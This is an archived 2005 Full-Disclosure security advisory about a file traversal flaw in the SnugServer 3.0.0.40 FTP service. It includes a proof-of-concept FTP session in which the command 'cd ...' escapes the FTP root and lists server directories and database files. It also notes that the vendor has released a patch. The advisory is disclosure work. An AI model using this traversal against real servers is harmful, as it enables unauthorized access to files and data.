Network Security: Detailed info on [Full-Disclosure] Remotely exploitable file traversal vulnerability in S

Subject:	[Full-Disclosure] Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40 FTP Service
Date:	Thu, 27 Jan 2005 17:37:41 +0200

See Security, Research and Development
www.see-security.com
------------------------------------------------------

[-] Product Information

SnugServer - All your Software Servers in 1 Application.
Upload and download files to/from the Internet. Unique 
firewall file system where your FTP files can be stored in a 
data file to prevent internal network hacker attacks. Product 
Homepage: http://www.snugserver.com/

[-] Vulnerability Description

A file traversal vulnerability has been discovered in 
SnugServer 3.0.0.40 FTP Service, which allows access to the 
server filesystem, outside of ftproot.

[-]PoC

root@Whoppix:/# ftp 192.168.1.154
Connected to 192.168.1.154.
220-
 Welcome FTP User. SnugServer is ready. 
 Name (192.168.1.154:root): muts@default.com
331  Password required for muts@default.com.
Password:
230  See FTP Server 
Remote system type is You.
ftp> ls
200  PORT Command Successful. 
150  Opening ASCII mode data connection for directory listing.
 drw-rw-rw-   1 owner    group            0  Jan 21 03:51 ..
 drw-rw-rw-   1 owner    group            0  Jan 21 02:08 dir
226  Transfer Complete.
ftp> cd ...
200  PORT Command Successful.
ftp> ls
200  PORT Command Successful. 
150  Opening ASCII mode data connection for directory listing.
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 ..
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Cert
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Logs
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Requests
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Scripts
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Errors
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Queue
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 www
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Infected
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Temp
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Filtered
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 BaseData
-rw-rw-rw-   1 owner    group 8421376  Jan 21 03:52 SNUG.FDB
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 ftp
-rw-rw-rw-   1 owner    group 1861120  Jan 21 03:52 Snug.gbk
-rw-rw-rw-   1 owner    group   32  Jan 21 03:52 yarrow.rnd
226  Transfer Complete.
ftp>
 
[-] Patch

The vendor has been notified, and an update is available at:
 
http://www.snugserver.com/download.php

[-] Credits

This vulnerability was discovered by muts
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

<Prev in Thread]	Current Thread	[Next in Thread>
[Full-Disclosure] Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40 FTP Service, muts <=

Previous by Date:	Re: [lists] [Full-Disclosure] Terminal Server vulnerabilities, Jan Muenther
Next by Date:	[Full-Disclosure] Possible new MYSql Worm, Thierry Zoller
Previous by Thread:	NSFOCUS SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name, NSFOCUS Security Team
Next by Thread:	[Full-Disclosure] Possible new MYSql Worm, Thierry Zoller
Indexes:	[Date] [Thread] [Top] [All Lists]